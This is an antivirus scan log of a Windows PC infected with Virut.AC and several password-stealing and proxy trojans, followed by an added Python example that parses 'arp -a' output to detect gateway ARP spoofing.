1/20/2008 4:41:37 PM Startup scanner file C:\Program Files\Common Files\Real\Update_OB\realsched.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\WINDOWS\49400W.exe probably a variant of Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:35 PM Startup scanner file C:\WINDOWS\49400L.exe Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:33 PM Startup scanner file C:\WINDOWS\49400M.exe probably a variant of Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:31 PM Startup scanner file C:\WINDOWS\system32\vgbxiqre.exe probably a variant of Win32/TrojanProxy.Ranky trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:30 PM Startup scanner file C:\Program Files\QuickTime\qttask.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:29 PM Startup scanner file C:\Program Files\Winamp\winampa.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:29 PM Startup scanner file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:28 PM Startup scanner file C:\WINDOWS\system32\iexplore.exe a variant of Win32/Poebot trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\Program Files\Common Files\InterVideo\SchSvr\SchSvr.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\WINDOWS\ALCMTR.EXE Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:24 PM Startup scanner file C:\WINDOWS\SOUNDMAN.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:24 PM Startup scanner file C:\WINDOWS\system32\Hdaudpropshortcut.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:23 PM Startup scanner file C:\WINDOWS\system32\hkcmd.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:22 PM Startup scanner file C:\WINDOWS\system32\igfxtray.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:13 PM Real-time file system protection file C:\Program Files\Common Files\Real\Update_OB\r1puninst.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:13 PM Real-time file system protection file C:\Program Files\Real\RealPlayer\realplay.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:12 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:12 PM Real-time file system protection file C:\WINDOWS\EXPLORER.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:11 PM Real-time file system protection file C:\WINDOWS\system32\verclsid.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:11 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
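Earlier in the thread, clearing the ARP cache brings the connection back and a static ARP entry for the gateway is suggested. The following added example (not code from any poster) parses Windows `arp -a` output to check whether the gateway's cached MAC address is what changes when the connection drops; the MAC addresses, the interface address and the 172.25.3.200 host are constructed, and the known-good gateway MAC is assumed to have been recorded from a trusted reading.

```python
import re

# One data row of Windows `arp -a` output: IP, dash-separated MAC, entry type.
_ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})\s+(\w+)\s*$"
)


def parse_arp_table(text):
    """Parse `arp -a` output into {ip: (mac, entry_type)}; header lines are skipped."""
    table = {}
    for line in text.splitlines():
        match = _ARP_ROW.match(line)
        if match:
            ip, mac, kind = match.groups()
            table[ip] = (mac.lower(), kind.lower())
    return table


def check_gateway(table, gateway_ip, known_gateway_mac):
    """Compare the cached gateway entry with the MAC recorded from a trusted reading."""
    known = known_gateway_mac.lower().replace(":", "-")
    entry = table.get(gateway_ip)
    if entry is None:
        return [("no-entry", gateway_ip)]
    mac, kind = entry
    findings = []
    if mac != known:
        # Traffic for the gateway is being sent to some other network card.
        findings.append(("gateway-mac-mismatch", mac))
    sharers = tuple(sorted(
        ip for ip, (other_mac, _) in table.items()
        if ip != gateway_ip and other_mac == mac
    ))
    if sharers:
        # The same card answers for the gateway and for another address.
        findings.append(("mac-shared-with", sharers))
    if kind != "static":
        # A dynamic entry can be overwritten by any ARP reply on the LAN;
        # `arp -s <gateway ip> <gateway mac>` pins it, as suggested in the thread.
        findings.append(("entry-not-static", kind))
    return findings


def changed_entries(before, after):
    """Return {ip: (old_mac, new_mac)} for addresses whose MAC differs between snapshots."""
    return {
        ip: (before[ip][0], after[ip][0])
        for ip in before.keys() & after.keys()
        if before[ip][0] != after[ip][0]
    }


GATEWAY_IP = "172.25.0.1"                # gateway address quoted in the thread
KNOWN_GATEWAY_MAC = "00-16-AA-00-00-01"  # constructed value

# Constructed snapshots: one taken while browsing works, one taken during an outage.
SNAPSHOT_WORKING = """
Interface: 172.25.3.77 --- 0x2
  Internet Address      Physical Address      Type
  172.25.0.1            00-16-aa-00-00-01     dynamic
  172.25.3.200          00-16-aa-00-03-c8     dynamic
"""
SNAPSHOT_BROKEN = """
Interface: 172.25.3.77 --- 0x2
  Internet Address      Physical Address      Type
  172.25.0.1            00-16-aa-00-03-c8     dynamic
  172.25.3.200          00-16-aa-00-03-c8     dynamic
"""

if __name__ == "__main__":
    working = parse_arp_table(SNAPSHOT_WORKING)
    broken = parse_arp_table(SNAPSHOT_BROKEN)
    print(check_gateway(broken, GATEWAY_IP, KNOWN_GATEWAY_MAC))
    print(changed_entries(working, broken))
```

Logging `arp -a` just before each `arp -d *` gives the snapshots to feed in.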